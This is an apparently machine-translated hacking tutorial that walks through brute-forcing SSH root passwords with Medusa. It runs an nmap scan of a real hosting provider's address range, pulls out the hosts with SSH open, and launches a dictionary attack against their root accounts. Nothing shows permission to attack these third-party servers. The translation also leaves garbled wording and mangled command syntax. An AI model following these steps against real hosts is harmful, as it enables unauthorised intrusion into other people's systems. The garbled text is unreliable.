Use medusa to crack the linuxssh Password

From accidentally climbing the blog, it's easy to crack medusa with your handwriting. First, let's look at the help root @ perl-exploit: pentestexploitsframework3 # medusaMedusav1.5 [http: www.foofus.net] (C) JoMo-KunFoofusNetworksjmk@foofus.netALERT: Hosti

From accidentally climbing \ 'blog

It hurts, just click it, mEdUsa is still relatively fast to crack. First, let's look at the help

Root @ perl-exploit:/pentest/exploits/framework3 # meDuSa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks

ALERT: Host infoRmAtion must beSuPplied.

Syntax: Medusa [-h host |-HFile] [-U username |-U file] [-p password |-P file] [-C file]-M module [OPT]
-H [TEXT]: Target hostname or IPDdRess
-H [FILE]: File containing target hostnames or IP addresses
-U [TEXT]: Username to test
-U [FILE]: File containing usernames to test
-P [TEXT]: Password to test
-P [FILE]: File containing passwords to test
-C [FILE]: File containing combo enTrIes. See READMEMoreInformation.
-O [FILE]: File to append log information
-E [n/s/ns]: Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT]: Name of the moduleExECutE (without the. mod extension)
-M [TEXT]: Parameter to pass to the module. This can be pasSedMultipleTimeS with
DiffErent parameter each time and they will all be sent to the module (I. e.
-M Param1-m Param2, etc .)
-D: Dump all known modules
-N [NUM]: Use for non-default TCP port number
-S: Enable SSL
-G [NUM]: Give up after trying to connect for NUM seconds (default 3)
-R [NUM]: Sleep NUM seconds between retry attempts (default 3)
-R [NUM]: Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-T [NUM]: Total number of logins to be tested coNcUrrently
-T [NUM]: Total number of hosts to be tested concurrently
-L: Parallelize logins using one username per thread. The default is to process
The entire username before proceeding.
-F: Stop scanning host after first valIdUsername/password found.
-F: Stop audit after first valid username/password found on any host.
-B: Suppress startup banner
-Q: Display module \'s usage information
-V [NUM]: Verbose level [0-6 (more)]
-W [NUM]: Error debug level [0-10 (more)]
-V: Display version
-Z [NUM]: Resume scan from host #

OK. Let's take a look at which modules medusa supports and what functions are cracked.

Root @ perl-exploit:/pentest/exploits/framework3 # medusa-d
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks

Available modules in ".":

Available modules in "/usr/lib/medusa/modules ":
+ Cvs. mod: Brute force module for CVS sessions: version 1.0.0
+ Ftp. mod: Brute force module for FTP/FTPS sessions: version 1.3.0
+ Http. mod: Brute force module for HTTP: version 1.3.0
+ Imap. mod: Brute force module for IMAP sessions: version 1.2.0
+ Mssql. mod: Brute force module for M $-SQL sessions: version 1.1.1
+ Mysql. mod: Brute force module for MySQL sessions: version 1.2
+ NCp. Mod: Brute force module for NCP sessions: version 1.0.0
+ Nntp. mod: Brute force module for NNTP sessions: version 1.0.0
+ Pcanywhere. mod: Brute force module for PcAnywhere sessions: version 1.0.2
+ Pop3.mod: Brute force module for POP3 sessions: version 1.2
+ Ipvs. mod: Brute force module for PostgreSQL sessions: version 1.0.0
+ Rexec. mod: Brute force module for REXEC sessions: version 1.1.1
+ Rlogin. mod: Brute force module for RLOGIN sessions: version 1.0.2
+ Rsh. mod: Brute force module for RSH sessions: version 1.0.1
+ Smbnt. mod: Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions: version 1.5
+ Smtp-vrfy.mod: Brute force module for enumerating accounts via smtp vrfy: version 1.0.0
+ Smtp. mod: Brute force module for SMTP AuthentiCatIon with TLS: version 1.0.0
+ Snmp. mod: Brute force module for SNMP Community Strings: version 1.0.0
+ Ssh. mod: Brute force module for SSH v2 sessions: version 1.0.2
+ Svn. mod: Brute force module for Subversion sessions: version 1.0.0
+ TeLnEt. mod: Brute force moduleTelnetSessions: version 1.2.2
+ Vmauthd. mod: Brute force module for the VMware Authentication Daemon: version 1.0.1
+ Vnc. mod: Brute force module for VNC sessions: version 1.0.1
+ Web-form.mod: Brute force module for web forms: version 1.0.0
+ Wrapper. mod: Generic Wrapper Module: version 1.0.1

Well, we need to crack ssh, so we need to use the-M ssh parameter to load the ssh module. We don't need to talk about it later with. mod.

First, let's determine the target, scan the machine that opens ssh, and find a segment to scan it.

Root @ perl-exploit:/pentest # nmap-sV-p22-oG ssh 69.163.190.0/24

Then there is a long wait. The preceding parameter scan means to scan the machine with port 22 in the entire segment, determine the service version, and save it to the ssh file.

Then we can view the scan results.

Root @ perl-exploit:/pentest # cat ssh
# Nmap 5.00 scan initiated Tue Jun 22 02:18:28 2010 as: nmap-sV-p22-oG ssh 69.163.190.0/24
Host: 69.163.190.1 (ip-69-163-190-1.dreamhost.com) Ports: 22/closed/tcp // ssh ///
Host: 69.163.190.2 (ip-69-163-190-2.dreamhost.com) Ports: 22/closed/tcp // ssh ///
Host: 69.163.190.3 (ip-69-163-190-3.dreamhost.com) Ports: 22/closed/tcp // ssh ///
Host: 69.163.190.4 (dragich.shaggy.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protoCol2.0 )/
Host: 69.163.190.5 (myrck.w.gebob.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.6 (apache2-twang.luthor.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.7 (ps11591.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.8 (ps000054.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.9 (rangerjill.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.10 (ouellette.yogi.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.11 (psmysql11957.dreamhostps.com) Ports: 22/open/tcp // ssh // OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0 )/
Host: 69.163.190.12 (rubeo.yogi.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.13 (alt-malware.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
In this case, we need to sort out the ssh-enabled IP addresses. Now we understand the meaning of oG storage.

Root @ perl-exploit:/pentest #Grep22/open ssh | cut-d ""-f 2> ssh1.txt

ThisCommandThe cut is used. View results

Root @ perl-exploit:/pentest # cat ssh1.txt
69.163.190.4
69.163.190.5
69.163.190.6
69.163.190.7
69.163.190.8
69.163.190.9
69.163.190.10
69.163.190.11
69.163.190.12
69.163.190.13
69.163.190.14
69.163.190.15
69.163.190.16
69.163.190.17
69.163.190.18
69.163.190.19
69.163.190.22
69.163.190.23
69.163.190.24
69.163.190.25
69.163.190.26
69.163.190.27
69.163.190.28
69.163.190.29
69.163.190.30
69.163.190.31
69.163.190.32
69.163.190.33
69.163.190.34
69.163.190.35
69.163.190.36
69.163.190.37
69.163.190.38
69.163.190.39
69.163.190.40
69.163.190.41
69.163.190.42
69.163.190.43
69.163.190.44
69.163.190.45
69.163.190.46
69.163.190.47
69.163.190.48
69.163.190.49
69.163.190.50
69.163.190.51
69.163.190.52
69.163.190.53
Now, let's start looking for a dictionary and cracking the ssh password.

Root @ perl-exploit:/pentest # medusa-H ssh1.txt-u root-P p.txt-M ssh

Root @ perl-exploit:/pentest # medusa-H ssh1.txt-u root-P p.txt-M ssh
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks